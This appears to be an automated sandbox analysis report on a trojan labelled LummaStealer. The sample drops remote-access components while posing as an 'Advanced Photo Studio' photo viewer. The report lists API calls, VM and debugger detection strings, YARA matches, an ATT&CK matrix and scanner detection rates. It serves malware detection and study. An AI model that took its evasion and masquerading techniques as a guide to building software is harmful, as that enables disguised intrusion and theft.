Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10701940 GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,6_2_10701940
Source: C:\Users\user\Desktop\Merge.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Window / User API: threadDelayed 9115
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Evasive API call chain: GetLocalTime,DecisionNodes | graph_6-51743
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes | graph_6-51257
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | API coverage: 6.6 %
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11103360 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,6_2_11103360
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110619A0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,6_2_110619A0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1102BC80 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102BC80
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMware
Source: Merge.exe, 00000000.00000002.2551385573.0000000000AFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll[
Source: DisplayPhotoViewer.exe, 00000006.00000003.2587207924.0000000007A5B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: #{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A4A0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: DisplayPhotoViewer.exe, 00000006.00000003.2554251525.00000000007B2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A624000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000002.3122142214.000000000A6A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: DisplayPhotoViewer.exe, 00000006.00000003.2935163803.000000000A712000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMWare
Source: DisplayPhotoViewer.exe, 00000006.00000002.3095745834.0000000000728000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWH
Source: DisplayPhotoViewer.exe, 00000006.00000002.3149738972.00000000664A0000.00000002.00000001.01000000.0000001A.sdmp | Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claJf
Source: DisplayPhotoViewer.exe, 00000006.00000003.2601442890.0000000007A55000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: lume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: VMNC;Vmware;;;http://www.vmware.com/;;;
Source: DisplayPhotoViewer.exe, 00000006.00000002.3185168214.0000000069D4D000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: VMNC;Vmware;4CC;V;;;;http://www.vmware.com/
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | API call chain: ExitProcess graph end node | graph_6-49130
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | API call chain: ExitProcess graph end node | graph_6-50074
Source: C:\Users\user\Desktop\Merge.exe | Code function: 0_2_016C1FE7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_016C1FE7
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10702410 CreateEventA,GetLastError,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetTickCount,GetMessageA,TranslateMessage,DispatchMessageA,GetCurrentThreadId,wsprintfA,wsprintfA,wsprintfA,GetCurrentThreadId,wsprintfA,OutputDebugStringA,wsprintfA,wsprintfA,GetModuleFileNameA,wsprintfA,GetTempPathA,GetLocalTime,GetVersionExA,wsprintfA,wsprintfA,wsprintfA,SetTimer,MessageBoxA,KillTimer,PeekMessageA,MessageBoxA,6_2_10702410
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1000DA20 _FreeImage_RegisterExternalPlugin@20,LoadLibraryA,GetProcAddress,FreeLibrary,FreeLibrary,6_2_1000DA20
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11171684 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_11171684
Source: C:\Users\user\Desktop\Merge.exe | Code function: 0_2_016AE75F SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_016AE75F
Source: C:\Users\user\Desktop\Merge.exe | Code function: 0_2_016C1FE7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_016C1FE7
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10275440 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_10275440
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1027C54E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_1027C54E
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11163549 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_11163549
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11157561 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_11157561
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1102F670 _NSMClient32@8,SetUnhandledExceptionFilter,6_2_1102F670
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110ED440 GetTickCount,LogonUserA,GetTickCount,GetLastError,6_2_110ED440
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11117F00 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,6_2_11117F00
Source: C:\Users\user\Desktop\Merge.exe | Process created: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe "C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe"
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_11098E70 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,6_2_11098E70
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110995F0 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,6_2_110995F0
Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A5B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerass
Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
Source: DisplayPhotoViewer.exe, DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman
Source: DisplayPhotoViewer.exe, 00000006.00000002.3120515904.000000000A5B4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: program manager*dow^
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Progman|
Source: DisplayPhotoViewer.exe, 00000006.00000003.2617846295.000000000A967000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2638496505.000000000B14D000.00000004.00000020.00020000.00000000.sdmp, DisplayPhotoViewer.exe, 00000006.00000003.2607592194.000000000AF2C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Shell_TrayWndTraceRunpluginTimeout
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: EnumSystemLocalesA,6_2_1070B4E7
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: EnumSystemLocalesA,6_2_1070B4E8
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: EnumSystemLocalesA,6_2_1070B14A
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,MultiByteToWideChar,6_2_1070E5F1
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoA,6_2_1070B6DC
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoA,MultiByteToWideChar,6_2_1070E6AE
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoA,IsValidCodePage,IsValidLocale,6_2_1070AF75
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoW,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,6_2_1070E704
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: EnumSystemLocalesA,6_2_1070B3D5
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: GetLocaleInfoW,WideCharToMultiByte,6_2_1070E7C7
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_111691F3
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_11169022
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_1116931A
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_11169356
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_111692B3
Source: C:\Users\user\Desktop\Merge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\__db.s5sg.4 VolumeInformation
Source: C:\Users\user\Desktop\Merge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\__db.s5sg.4 VolumeInformation
Source: C:\Users\user\Desktop\Merge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\s5sg.4 VolumeInformation
Source: C:\Users\user\Desktop\Merge.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\TMP3B6C.tmp VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\Merge.exe | Code function: 0_2_016AEDCC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_016AEDCC
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110391A0 _calloc,GetUserNameA,_free,_calloc,_free,6_2_110391A0
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1070E05D InterlockedDecrement,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,6_2_1070E05D
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10007420 _FreeImage_GetVersion@0,6_2_10007420
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_10703240 CapiListen,6_2_10703240
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_110D1640 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,6_2_110D1640
Source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | Code function: 6_2_1106B9D0 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,6_2_1106B9D0
                                Source: Yara match | File source: Process Memory Space: DisplayPhotoViewer.exe PID: 7172, type: MEMORYSTR
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\remcmdstub.exe, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcichek.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\tcctl32.dll, type: DROPPED
                                Source: Yara match | File source: C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicl32.dll, type: DROPPED
                                Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts (2) | Native API (3) | DLL Side-Loading (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | Input Capture (41) | System Time Discovery (2) | Remote Services | Archive Collected Data (11) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
                                Credentials | Domains | Replication Through Removable Media (1) | Service Execution (2) | DLL Search Order Hijacking (1) | DLL Search Order Hijacking (1) | Obfuscated Files or Information (3) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Screen Capture (1) | Encrypted Channel (12) | Exfiltration Over Bluetooth | Defacement (1)
                                Email Addresses | DNS Server | Domain Accounts | At | Valid Accounts (2) | Valid Accounts (2) | Software Packing (12) | Security Account Manager | Account Discovery (1) | SMB/Windows Admin Shares | Input Capture (41) | Non-Application Layer Protocol (4) | Automated Exfiltration | Data Encrypted for Impact
                                Employee Names | Virtual Private Server | Local Accounts | Cron | Windows Service (1) | Access Token Manipulation (21) | DLL Side-Loading (1) | NTDS | File and Directory Discovery (4) | Distributed Component Object Model | Clipboard Data (3) | Application Layer Protocol (5) | Traffic Duplication | Data Destruction
                                Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Windows Service (1) | DLL Search Order Hijacking (1) | LSA Secrets | System Information Discovery (24) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                                Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | Process Injection (12) | Masquerading (1) | Cached Domain Credentials | Security Software Discovery (131) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                                DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Valid Accounts (2) | DCSync | Process Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                                Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation (21) | Proc Filesystem | Application Window Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                                Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (12) | /etc/passwd and /etc/shadow | System Owner/User Discovery (1) | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                                Source | Detection | Scanner | Label
                                Merge.exe | 20% | Virustotal |
                                Merge.exe | 16% | ReversingLabs | Win32.Trojan.LummaStealer
                                Source | Detection | Scanner | Label
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\DisplayPhotoViewer.exe | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FilesystemDialogs.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\FreeImage.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\JEncrypt.dll | 8% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\MediaInfo.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\RwcTouch.dll | 4% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\audiocapture.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\bass.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\htctl32.dll | 3% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\msvcr100.dll | 0% | ReversingLabs |
                                C:\Users\user\AppData\Local\Programs\Advanced Photo Studio\pcicapi.dll | 3% | ReversingLabs |
